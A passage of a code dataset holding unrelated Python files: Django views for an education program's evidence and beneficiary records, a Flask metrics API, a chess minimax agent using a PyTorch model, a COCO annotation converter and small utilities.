self.object.beneficiarios_cargados.all()\n formador = Formador.objects.get(id = self.kwargs['id_formador'])\n entregable = Entregable.objects.get(id = self.kwargs['id_entregable'])\n evidencias = Evidencia.objects.filter(formador = formador,entregable = entregable).filter(beneficiarios_cargados__id__in = cargados.values_list('id',flat=True))\n\n for evidencia in evidencias:\n for cargado in cargados:\n evidencia.beneficiarios_cargados.remove(cargado)\n\n return super(UpdateSoporteView,self).form_valid(form)\n\n\nclass DeleteSoporteView(LoginRequiredMixin,\n PermissionRequiredMixin,\n DeleteView):\n model = Evidencia\n pk_url_kwarg = 'id_soporte'\n success_url = '../../'\n template_name = 'evidencias/general/eliminar.html'\n permission_required = \"permisos_sican.evidencias.general.eliminar\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_nivel'] = self.kwargs['id_nivel']\n kwargs['id_sesion'] = self.kwargs['id_sesion']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_nivel'] = Nivel.objects.get(id = self.kwargs['id_nivel']).nombre\n kwargs['nombre_sesion'] = Sesion.objects.get(id = self.kwargs['id_sesion']).nombre\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n kwargs['id_entregable'] = self.kwargs['id_entregable']\n kwargs['nuevo_permiso'] = self.request.user.has_perm('permisos_sican.evidencias.general.crear')\n return super(DeleteSoporteView,self).get_context_data(**kwargs)\n\n\n\nclass EvidenciasListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/codigos/lista.html'\n permission_required = \"permisos_sican.evidencias.codigos.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['informes'] = self.request.user.has_perm('permisos_sican.evidencias.codigos.informes')\n return super(EvidenciasListView,self).get_context_data(**kwargs)\n\n\nclass RedsListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/red/lista.html'\n permission_required = \"permisos_sican.evidencias.red.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['nuevo_permiso'] = self.request.user.has_perm('permisos_sican.evidencias.red.crear')\n return super(RedsListView,self).get_context_data(**kwargs)\n\n\nclass NuevoRedView(LoginRequiredMixin,\n PermissionRequiredMixin,\n CreateView):\n model = Red\n form_class = RedForm\n success_url = '../'\n template_name = 'evidencias/red/nuevo.html'\n permission_required = \"permisos_sican.evidencias.red.crear\"\n\n def get_context_data(self, **kwargs):\n\n evidencias = Evidencia.objects.filter(red_id = None)\n\n region_1 = Region.objects.get(numero = 1)\n region_2 = Region.objects.get(numero = 2)\n\n evidencias_r1 = evidencias.filter(formador__region = region_1)\n evidencias_r2 = evidencias.filter(formador__region = region_2)\n\n evidencias_r1_innovatic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'INNOVATIC')\n evidencias_r1_tecnotic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'TECNOTIC')\n evidencias_r1_directic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'DIRECTIC')\n evidencias_r1_escuelatic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'ESCUELA TIC FAMILIA')\n\n evidencias_r2_innovatic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'INNOVATIC')\n evidencias_r2_tecnotic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'TECNOTIC')\n evidencias_r2_directic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'DIRECTIC')\n evidencias_r2_escuelatic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'ESCUELA TIC FAMILIA')\n\n ple_r1 = Beneficiario.objects.filter(region__id=1,estado_producto_final='cargado')\n ple_r2 = Beneficiario.objects.filter(region__id=2, estado_producto_final='cargado')\n\n\n kwargs['formadores_innovatic_r1'] = evidencias_r1_innovatic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_innovatic_r1'] = evidencias_r1_innovatic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_innovatic_r1'] = evidencias_r1_innovatic.count()\n\n kwargs['formadores_tecnotic_r1'] = evidencias_r1_tecnotic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_tecnotic_r1'] = evidencias_r1_tecnotic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_tecnotic_r1'] = evidencias_r1_tecnotic.count()\n\n kwargs['formadores_directic_r1'] = evidencias_r1_directic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_directic_r1'] = evidencias_r1_directic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_directic_r1'] = evidencias_r1_directic.count()\n\n kwargs['formadores_escuelatic_r1'] = evidencias_r1_escuelatic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_escuelatic_r1'] = evidencias_r1_escuelatic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_escuelatic_r1'] = evidencias_r1_escuelatic.count()\n\n kwargs['formadores_innovatic_r2'] = evidencias_r2_innovatic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_innovatic_r2'] = evidencias_r2_innovatic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_innovatic_r2'] = evidencias_r2_innovatic.count()\n\n kwargs['formadores_tecnotic_r2'] = evidencias_r2_tecnotic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_tecnotic_r2'] = evidencias_r2_tecnotic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_tecnotic_r2'] = evidencias_r2_tecnotic.count()\n\n kwargs['formadores_directic_r2'] = evidencias_r2_directic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_directic_r2'] = evidencias_r2_directic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_directic_r2'] = evidencias_r2_directic.count()\n\n kwargs['formadores_escuelatic_r2'] = evidencias_r2_escuelatic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_escuelatic_r2'] = evidencias_r2_escuelatic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_escuelatic_r2'] = evidencias_r2_escuelatic.count()\n\n kwargs['ple_r1'] = ple_r1.count()\n kwargs['ple_r2'] = ple_r2.count()\n\n return super(NuevoRedView,self).get_context_data(**kwargs)\n\n def form_valid(self, form):\n self.object = form.save()\n\n red = Red.objects.get(id = self.object.id)\n\n if not red.producto_final:\n evidencias = Evidencia.objects.filter(red_id = None)\n\n region_1 = Region.objects.get(numero = 1)\n region_2 = Region.objects.get(numero = 2)\n\n evidencias_r1 = evidencias.filter(formador__region = region_1)\n evidencias_r2 = evidencias.filter(formador__region = region_2)\n\n evidencias_r1_innovatic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'INNOVATIC')\n evidencias_r1_tecnotic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'TECNOTIC')\n evidencias_r1_directic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'DIRECTIC')\n evidencias_r1_escuelatic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'ESCUELA TIC FAMILIA')\n\n evidencias_r2_innovatic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'INNOVATIC')\n evidencias_r2_tecnotic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'TECNOTIC')\n evidencias_r2_directic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'DIRECTIC')\n evidencias_r2_escuelatic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'ESCUELA TIC FAMILIA')\n\n\n\n if self.object.region.numero == 1:\n if self.object.diplomado.nombre == 'INNOVATIC':\n evidencias_r1_innovatic.update(red_id = red.id)\n elif self.object.diplomado.nombre == 'TECNOTIC':\n evidencias_r1_tecnotic.update(red_id = red.id)\n elif self.object.diplomado.nombre == 'DIRECTIC':\n evidencias_r1_directic.update(red_id = red.id)\n elif self.object.diplomado.nombre == 'ESCUELA TIC FAMILIA':\n evidencias_r1_escuelatic.update(red_id = red.id)\n else:\n pass\n\n elif self.object.region.numero == 2:\n if self.object.diplomado.nombre == 'INNOVATIC':\n evidencias_r2_innovatic.update(red_id = red.id)\n elif self.object.diplomado.nombre == 'TECNOTIC':\n evidencias_r2_tecnotic.update(red_id = red.id)\n elif self.object.diplomado.nombre == 'DIRECTIC':\n evidencias_r2_directic.update(red_id = red.id)\n elif self.object.diplomado.nombre == 'ESCUELA TIC FAMILIA':\n evidencias_r2_escuelatic.update(red_id = red.id)\n else:\n pass\n\n\n else:\n pass\n red.save()\n build_red.delay(red.id)\n else:\n ple_r1 = Beneficiario.objects.filter(region__id=1, estado_producto_final='cargado')\n ple_r2 = Beneficiario.objects.filter(region__id=2, estado_producto_final='cargado')\n\n if self.object.region.numero == 1:\n if self.object.diplomado.nombre == 'INNOVATIC':\n for beneficiario in ple_r1:\n red.beneficiarios.add(beneficiario)\n beneficiario.estado_producto_final = 'enviado'\n beneficiario.save()\n else:\n pass\n\n elif self.object.region.numero == 2:\n if self.object.diplomado.nombre == 'INNOVATIC':\n for beneficiario in ple_r2:\n red.beneficiarios.add(beneficiario)\n beneficiario.estado_producto_final = 'enviado'\n beneficiario.save()\n else:\n pass\n\n else:\n pass\n\n red.save()\n build_red_producto_final.delay(red.id)\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass UpdateRedView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UpdateView):\n model = Red\n form_class = RedRetroalimentacionForm\n success_url = '../../'\n template_name = 'evidencias/red/editar.html'\n permission_required = \"permisos_sican.evidencias.red.editar\"\n\n\n def form_valid(self, form):\n self.object = form.save()\n retroalimentacion_red.delay(self.object.id)\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass CargaMasivaListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/cargamasiva/lista.html'\n permission_required = \"permisos_sican.evidencias.cargamasivaevidencias.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['nuevo_permiso'] = self.request.user.has_perm('permisos_sican.evidencias.cargamasivaevidencias.crear')\n return super(CargaMasivaListView,self).get_context_data(**kwargs)\n\n\nclass NuevoCargaMasivaView(LoginRequiredMixin,\n PermissionRequiredMixin,\n CreateView):\n model = CargaMasiva\n form_class = CargaMasivaForm\n success_url = '../'\n template_name = 'evidencias/cargamasiva/nuevo.html'\n permission_required = \"permisos_sican.evidencias.cargamasivaevidencias.crear\"\n\n def get_initial(self):\n return {'id_usuario':self.request.user.id}\n\n def form_valid(self, form):\n self.object = form.save()\n carga_masiva_evidencias.delay(self.object.id,self.request.user.id)\n return super(NuevoCargaMasivaView,self).form_valid(form)\n\n\nclass AuxiliaresListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/rendimiento/lista.html'\n permission_required = \"permisos_sican.auxiliares.rendimiento.ver\"\n\n\nclass BeneficiarioEvidenciaCedulaList(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/cedula/lista_beneficiarios.html'\n permission_required = \"permisos_sican.evidencias.cedula_beneficiario.ver\"\n\n\nclass BeneficiarioEvidenciaCedulaProductoList(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/cedula/lista_productos.html'\n permission_required = \"permisos_sican.evidencias.cedula_beneficiario.ver\"\n\n\n def get_context_data(self, **kwargs):\n kwargs['id_beneficiario'] = self.kwargs['id_beneficiario']\n kwargs['nombre_beneficiario'] = Beneficiario.objects.get(id = self.kwargs['id_beneficiario']).get_full_name()\n return super(BeneficiarioEvidenciaCedulaProductoList,self).get_context_data(**kwargs)\n\nclass SubsanacionListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/subsanacion/lista_reds.html'\n permission_required = \"permisos_sican.evidencias.subsanacion.ver\"\n\n\nclass SubsanacionEvidenciasListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/subsanacion/lista_evidencias.html'\n permission_required = \"permisos_sican.evidencias.subsanacion.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_red'] = self.kwargs['id_red']\n return super(SubsanacionEvidenciasListView,self).get_context_data(**kwargs)\n\n\n\nclass PleListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/ple/lista.html'\n permission_required = \"permisos_sican.evidencias.subsanacion_ple.ver\"\n\n\n\n\n\n\nclass PleBeneficiarioView(LoginRequiredMixin,\n PermissionRequiredMixin,\n FormView):\n form_class = PleBeneficiarioForm\n success_url = '../../'\n template_name = 'evidencias/ple/editar.html'\n permission_required = \"permisos_sican.evidencias.subsanacion_ple.editar\"\n\n\n def get_context_data(self, **kwargs):\n kwargs['cedula'] = Beneficiario.objects.get(id=self.kwargs['id_beneficiario']).cedula\n return super(PleBeneficiarioView,self).get_context_data(**kwargs)\n\n def get_initial(self):\n return {'beneficiario':Beneficiario.objects.get(id=self.kwargs['id_beneficiario'])}\n\n\n def form_valid(self, form):\n beneficiario = Beneficiario.objects.get(id=self.kwargs['id_beneficiario'])\n\n\n beneficiario.nombre_producto_final = form.cleaned_data['nombre']\n beneficiario.area_basica_producto_final = form.cleaned_data['area']\n beneficiario.estado_producto_final = 'cargado'\n beneficiario.para_leer = form.cleaned_data['para_leer']\n beneficiario.para_hacer_1 = form.cleaned_data['para_hacer_1']\n beneficiario.para_hacer_2 = form.cleaned_data['para_hacer_2']\n beneficiario.para_hacer_3 = form.cleaned_data['para_hacer_3']\n beneficiario.para_hacer_4 = form.cleaned_data['para_hacer_4']\n beneficiario.imagen_historieta = form.cleaned_data['imagen_historieta']\n beneficiario.imagen_infografia = form.cleaned_data['imagen_infografia']\n beneficiario.imagen_graficacion_ple = form.cleaned_data['imagen_graficacion_ple']\n beneficiario.link_ruta_sostenibilidad = form.cleaned_data['link_ruta_sostenibilidad']\n beneficiario.imagen_para_leer = form.cleaned_data['imagen_para_leer']\n beneficiario.html = File(open(settings.STATICFILES_DIRS[0] + '\\\\documentos\\\\ple.html'))\n beneficiario.save()\n\n file = codecs.open(beneficiario.html.path, 'r+', 'utf-8')\n text_index_1 = file.read()\n file = codecs.open(beneficiario.html.path, 'w', 'utf-8')\n\n para_hacer_adicionales = []\n\n if beneficiario.para_hacer_2 != \"\":\n para_hacer_adicionales.append(beneficiario.para_hacer_2)\n\n if beneficiario.para_hacer_3 != \"\":\n para_hacer_adicionales.append(beneficiario.para_hacer_3)\n\n if beneficiario.para_hacer_4 != \"\":\n para_hacer_adicionales.append(beneficiario.para_hacer_4)\n\n\n adicional = ''\n\n for x in para_hacer_adicionales:\n adicional += '
        '\n\n\n navar_color_list = ['#194F83','#4C4A9C',\"#831A1C\",\"#008346\"]\n section_color_list = ['#3DCF8C',\"#3DC8CF\",\"#9C9671\",\"#9C3DCF\"]\n\n navar_color = random.choice(navar_color_list)\n section_color = random.choice(section_color_list)\n\n imagen_para_leer = ''\n if beneficiario.imagen_para_leer != None:\n imagen_para_leer = ''\n\n file.write(text_index_1.replace('{{IMAGEN_PARA_LEER}}',imagen_para_leer).replace('{{NAVAR_COLOR}}',navar_color).replace('{{SECTION_COLOR}}',section_color).replace('{{TITULO}}', beneficiario.nombre_producto_final).replace('{{NOMBRE_DOCENTE}}',beneficiario.nombres+\" \"+beneficiario.apellidos + \" - \"+str(beneficiario.cedula)).replace('{{TEXTO_PARA_LEER}}',beneficiario.para_leer).replace('{{URL_PARA_HACER}}',beneficiario.para_hacer_1).replace('{{URL_PARA_HACER_ADICIONAL}}',adicional).replace('{{URL_HISTORIETA}}',beneficiario.imagen_historieta.url).replace('{{URL_INFOGRAFIA}}',beneficiario.imagen_infografia.url).replace('{{URL_GRAFICACION_PLE}}',beneficiario.imagen_graficacion_ple.url).replace('{{URL_RUTA_SOSTENIBILIDAD}}',beneficiario.link_ruta_sostenibilidad.replace('scene','card')))\n\n file.close()\n\n beneficiario.link = beneficiario.html.url\n\n beneficiario.save()\n\n\n return HttpResponseRedirect(self.get_success_url())\n\n\n\n\n\nclass SubsanacionEvidenciasFormView(LoginRequiredMixin,\n PermissionRequiredMixin,\n FormView):\n\n form_class = SubsanacionEvidenciaForm\n success_url = '../'\n template_name = 'evidencias/subsanacion/evidencia.html'\n permission_required = \"permisos_sican.evidencias.subsanacion.crear\"\n\n def get_context_data(self, **kwargs):\n\n evidencia = Evidencia.objects.get(id = self.kwargs['id_evidencia'])\n\n kwargs['id_red'] = self.kwargs['id_red']\n kwargs['id_evidencia'] = self.kwargs['id_evidencia']\n kwargs['link_soporte'] = evidencia.get_archivo_url()\n kwargs['nombre_soporte'] = os.path.basename(evidencia.archivo.name)\n\n return super(SubsanacionEvidenciasFormView,self).get_context_data(**kwargs)\n\n def get_initial(self):\n return {'id_red':self.kwargs['id_red'],'id_evidencia':self.kwargs['id_evidencia']}\n\n def form_valid(self, form):\n keys = list(form.cleaned_data.keys())\n keys.remove('archivo')\n keys.remove('observacion')\n\n evidencia = Evidencia.objects.get(id = self.kwargs['id_evidencia'])\n\n\n if form.cleaned_data['archivo'] != None:\n archivo = form.cleaned_data['archivo']\n else:\n archivo = evidencia.archivo\n\n nueva_evidencia = Evidencia.objects.create(usuario = self.request.user,archivo = archivo,entregable=evidencia.entregable,\n formador=evidencia.formador,subsanacion=True)\n\n cantidad = 0\n\n for key in keys:\n if form.cleaned_data[key]:\n cantidad += 1\n beneficiario = Beneficiario.objects.get(id = key.split('_')[1])\n nueva_evidencia.beneficiarios_cargados.add(beneficiario)\n rechazo = Rechazo.objects.filter(evidencia_id__exact = self.kwargs['id_evidencia'],beneficiario_rechazo = beneficiario)\n\n try:\n evidencia.beneficiarios_cargados.remove(beneficiario)\n except:\n pass\n try:\n evidencia.beneficiarios_rechazados.remove(rechazo[0])\n except:\n pass\n\n nueva_evidencia.cantidad_cargados = cantidad\n nueva_evidencia.save()\n\n Subsanacion.objects.create(evidencia_origen = evidencia,evidencia_subsanada=nueva_evidencia,usuario=self.request.user,\n red = Red.objects.get(id = self.kwargs['id_red']),observacion = form.cleaned_data['observacion'])\n\n\n return super(SubsanacionEvidenciasFormView,self).form_valid(form)\n\n\n\n\nclass SubsanacionEvidenciasBeneficiarioView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UpdateView):\n\n model = Beneficiario\n form_class = BeneficiarioUpdateForm\n success_url = '../../'\n template_name = 'evidencias/subsanacion/actualizar_participante.html'\n permission_required = \"permisos_sican.evidencias.subsanacion.crear\"\n pk_url_kwarg = 'id_beneficiario'\n\n def get_context_data(self, **kwargs):\n\n evidencia = Evidencia.objects.get(id = self.kwargs['id_evidencia'])\n\n kwargs['id_red'] = self.kwargs['id_red']\n kwargs['id_evidencia'] = self.kwargs['id_evidencia']\n kwargs['link_soporte'] = evidencia.get_archivo_url()\n kwargs['nombre_soporte'] = os.path.basename(evidencia.archivo.name)\n\n return super(SubsanacionEvidenciasBeneficiarioView,self).get_context_data(**kwargs)\n\n\n def get_initial(self):\n return {'id_red':self.kwargs['id_red'],'id_evidencia':self.kwargs['id_evidencia'],'diplomado_nombre':self.object.diplomado.nombre.upper(),'formador_id':self.object.formador.id,'beneficiario_id':self.object.id}\n\n\n def form_valid(self, form):\n self.object = form.save()\n if self.object.diplomado.nombre != 'ESCUELA TIC FAMILIA':\n self.object.radicado = Radicado.objects.get(numero=form.cleaned_data['radicado_text'])\n self.object.save()\n return super(SubsanacionEvidenciasBeneficiarioView, self).form_valid(form)\n\n\n\n\nclass ListaSubsanacionEvidenciaView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/subsanacion/lista_subsanaciones.html'\n permission_required = \"permisos_sican.evidencias.subsanacion.ver\"\n\n def get_context_data(self, **kwargs):\n\n evidencia = Evidencia.objects.get(id = self.kwargs['id_evidencia'])\n\n kwargs['id_red'] = self.kwargs['id_red']\n kwargs['id_evidencia'] = self.kwargs['id_evidencia']\n kwargs['link_soporte'] = evidencia.get_archivo_url()\n kwargs['nombre_soporte'] = os.path.basename(evidencia.archivo.name)\n\n return super(ListaSubsanacionEvidenciaView,self).get_context_data(**kwargs)","sub_path":"evidencias/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":35566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"506701724","text":"from collections import Counter\nfrom flask_restful import Resource\nfrom flask import request\nfrom src.models.api_response import APIResponse, post_error\nfrom src.models.api_enums import APIStatus\nfrom src.repositories import SummarizeDatasetRepo\nimport logging\n\nlog = logging.getLogger('file')\nsummarizeDatasetRepo = SummarizeDatasetRepo()\n\n\nclass DatasetSearchResource(Resource):\n def get(self):\n search_result = summarizeDatasetRepo.search()\n res = APIResponse(APIStatus.SUCCESS.value, search_result)\n return res.getresjson(), 200\n\nclass DatasetAggregateResource(Resource):\n def post(self):\n body = request.get_json()\n log.info(\"Metric request received for datasets\")\n try:\n search_result, count = summarizeDatasetRepo.aggregate(body)\n except Exception as e:\n log.exception(\"Exception at DatasetAggregateResource:{}\".format(str(e)))\n return post_error(\"Data Missing\",\"Mandatory key checks failed\",None), 400\n res = APIResponse(APIStatus.SUCCESS.value, search_result,count)\n return res.getresjson(), 200\n\nclass ModelAggregateResource(Resource):\n def post(self):\n body = request.get_json()\n log.info(\"Metric request received for models\")\n try:\n search_result,count = summarizeDatasetRepo.aggregate_models(body)\n except Exception as e:\n log.exception(\"Exception at DatasetAggregateResource:{}\".format(str(e)))\n return post_error(\"Data Missing\",\"Mandatory key checks failed\",None), 400\n res = APIResponse(APIStatus.SUCCESS.value, search_result,count)\n return res.getresjson(), 200\n","sub_path":"backend/metric/ulca-metric-api/src/resources/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"649253830","text":"import chess\nimport numpy as np\nimport sys\nimport os\nimport torch\n\nfrom net import Net\nfrom board_parser import parse_board\n\nmodel_path = \"/Users/david/Dropbox/chessNet/models/\" + \"valuator_3.1.15.pth\"\n\nclass Game(object):\n def __init__(self, depth, init=1, model=None):\n self.board = chess.Board()\n self.model = self.load_agent_model(model_path) if model == None else model\n self.history = []\n\n # 1 = agent plays blacks / 0 = agent plays whites\n self.init = init\n self.depth = depth\n if init == 0:\n self.agent_move()\n\n def load_agent_model(self, path):\n weights = torch.load(model_path, map_location=lambda storage, loc: storage)\n model = Net()\n model.load_state_dict(weights)\n model.eval()\n return model\n\n def move(self, string_move):\n \"\"\" Return True if move is legal, False if move is not legal \"\"\"\n user_move = chess.Move.from_uci(string_move)\n if user_move in self.board.legal_moves:\n print(\"User moves:\", string_move)\n self.board.push(user_move)\n agent_move = self.agent_move()\n self.history.append([string_move, str(agent_move)])\n return True, agent_move\n else:\n return False, None\n \n def evaluate(self, state):\n pstate = parse_board(state)\n pstate = np.expand_dims(pstate, axis=0)\n \n shape = pstate.shape\n pstate = torch.from_numpy(pstate).float()\n\n val = self.model(pstate)[0]\n return val.item()\n\n def minimax(self, node, depth, maximizingPlayer):\n if depth == 0:\n return self.evaluate(node)\n \n if maximizingPlayer:\n value = float(\"-inf\")\n for legal in node.legal_moves:\n node.push(legal)\n value = max(value, self.minimax(node, depth-1, False))\n node.pop()\n return value\n\n else:\n value = float('inf')\n for legal in node.legal_moves:\n node.push(legal)\n value = min(value, self.minimax(node, depth-1, True))\n node.pop()\n return value\n\n def minimax_refactor(self, node, depth, maximizingPlayer):\n if depth == 0:\n return self.evaluate(node)\n \n scores = []\n moves = []\n if maximizingPlayer:\n value = float(\"-inf\")\n for legal in node.legal_moves:\n node.push(legal)\n value = max(value, self.minimax(node, depth-1, False))\n\n scores.append(value)\n moves.append(legal)\n \n node.pop()\n return value, scores, moves\n\n else:\n value = float('inf')\n for legal in node.legal_moves:\n node.push(legal)\n value = min(value, self.minimax(node, depth-1, True))\n\n scores.append(value)\n moves.append(legal)\n\n node.pop()\n return value, scores, moves\n \n def agent_move(self):\n \"\"\"\n scores = []\n legal_moves = list(self.board.legal_moves)\n for legal in legal_moves:\n placeholder_board = chess.Board(self.board.fen())\n placeholder_board.push(legal)\n \n if self.init == 1:\n val = self.minimax(placeholder_board, self.depth, True)\n elif self.init == 0:\n val = self.minimax(placeholder_board, self.depth, False)\n scores.append(val)\n\n placeholder_board.pop()\n \"\"\"\n\n b_value, scores, moves = self.minimax_refactor(self.board, self.depth, not self.init)\n print(scores)\n \n \"\"\"\n if self.init == 1:\n b_value = min(scores)\n elif self.init == 0:\n b_value = max(scores)\n else:\n print(\"Self.init not good value\", self.init)\n exit(0)\n \"\"\"\n\n b_idx = scores.index(b_value)\n #best_move = list(legal_moves)[b_idx] \n best_move = moves[b_idx]\n\n self.board.push(best_move)\n print(\"Machine move:\", best_move, \"Value=\", b_value)\n return best_move\n\n def autoplay(self):\n self.init = 0\n while not self.board.is_game_over():\n a_move = self.agent_move()\n print(\"Computer %s: %s\" %(\"Black\" if self.init == 1 else \"White\", a_move))\n print(self.board)\n #self.init = 1 if self.init == 0 else 1\n self.init = not self.init\n\n return self.board.result()\n\nif __name__ == \"__main__\":\n depth = 2\n game = Game(depth=depth)\n\n args = sys.argv[1:]\n if len(args) > 0:\n if args[0] == \"autoplay\":\n try:\n n_games = int(args[1])\n results = {\"1-0\": 0, \"1/2-1/2\": 0, \"0-1\": 0}\n for n in range(n_games):\n print(f\"Playing game: {n}/{n_games}\")\n print(\"--------------\")\n res = game.autoplay()\n results[res] += 1\n game = Game(depth=depth)\n print(results)\n except Exception as e:\n print(\"Number of games needed\")\n elif args[0] == \"play\":\n while not game.board.is_game_over():\n print(game.board)\n user_move = input(\"Move: \")\n if user_move == \"q\":\n break\n # legal = game.move(\"b2b3\")\n legal = game.move(user_move)\n\n if not legal:\n print(\"Move not legal\")\n else:\n print(\"Options needed: play or autoplay\")\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"629359567","text":"import json\nimport os\n\nimport cv2\n\ndataset = {\n 'licenses': [],\n 'info': [],\n 'categories': [],\n 'images': [],\n 'annotations': []\n}\n\nclasses = ['adidas', 'aldi', 'apple', 'becks', 'bmw',\n 'carlsberg', 'chimay', 'cocacola', 'corona', 'dhl',\n 'erdinger', 'esso', 'fedex', 'ferrari', 'ford',\n 'fosters', 'google', 'guiness', 'heineken', 'HP',\n 'milka', 'nvidia', 'paulaner', 'pepsi', 'rittersport',\n 'shell', 'singha', 'starbucks', 'stellaartois', 'texaco',\n 'tsingtao', 'ups']\n\nfor i, cls in enumerate(classes, 1): #指定索引的起始值从1开始\n dataset['categories'].append({\n 'id': i,\n 'name': cls,\n 'supercategory': 'logo'\n })\n\ndef get_category_id(cls):\n for category in dataset['categories']:\n if category['name'] == cls:\n return category['id']\n\nj = 1\nwith open('files/test.txt', 'r') as f:\n img_number = 0\n file_name_dict = {}\n lines = [line for line in f.readlines() if line.strip()]\n for i, line in enumerate(lines):\n parts = line.strip().split()\n fn = parts[0]\n cls = parts[1]\n x1 = int(parts[2])\n y1 = int(parts[3])\n width = int(parts[4])\n height = int(parts[5])\n if cls == 'no-logo':\n continue\n img_dir = os.path.join('files/jpg', cls)\n im = cv2.imread(os.path.join(img_dir, fn))\n img_height, img_width, _ = im.shape\n if fn in file_name_dict:\n img_id = file_name_dict[fn]\n else:\n img_number = img_number + 1\n file_name_dict[fn] = img_number\n img_id = file_name_dict[fn]\n dataset['images'].append({\n 'coco_url': '',\n 'date_captured': '',\n 'file_name': fn,\n 'flickr_url': '',\n 'id': img_id,\n 'license': 0,\n 'width': img_width,\n 'height': img_height\n })\n\n dataset['annotations'].append({\n 'area': width * height,\n 'bbox': [x1, y1, width, height],\n 'category_id': get_category_id(cls),\n 'id': j,\n 'image_id': img_id,\n 'iscrowd': 0,\n 'segmentation': []\n })\n j += 1\n\nfolder = os.path.join('files/', 'finalanno')\nif not os.path.exists(folder):\n os.makedirs(folder)\njson_name = os.path.join('files', 'finalanno/val.json')\nwith open(json_name, 'w') as f:\n json.dump(dataset, f)\nprint(len(dataset['images']))\nprint(len(dataset['annotations']))\n","sub_path":"annotation.py","file_name":"annotation.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51937770","text":"\"\"\"\n Serialization and deserialization of directions in the direction file.\n\"\"\"\n\nimport torch\n\ndef write_list(f, name, direction):\n \"\"\"Write a list of numpy arrays into the hdf5 file\"\"\"\n grp = f.create_group(name)\n for i, l in enumerate(direction):\n if isinstance(l, torch.Tensor):\n l = l.numpy()\n grp.create_dataset(str(i), data=l)\n\n\ndef read_list(f, name):\n \"\"\"Read a list of numpy arrays from the hdf5 file\"\"\"\n grp = f[name]\n return [grp[str(i)] for i in range(len(grp))]\n","sub_path":"h5_util.py","file_name":"h5_util.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"305477995","text":"FH=open(\"captains.txt\")\r\ndata=list()\r\nclass cricket:\r\n def __init__(self,list1):\r\n self.name=list1[0]\r\n self.mat=int(list1[2])\r\n self.won=int(list1[3])\r\n 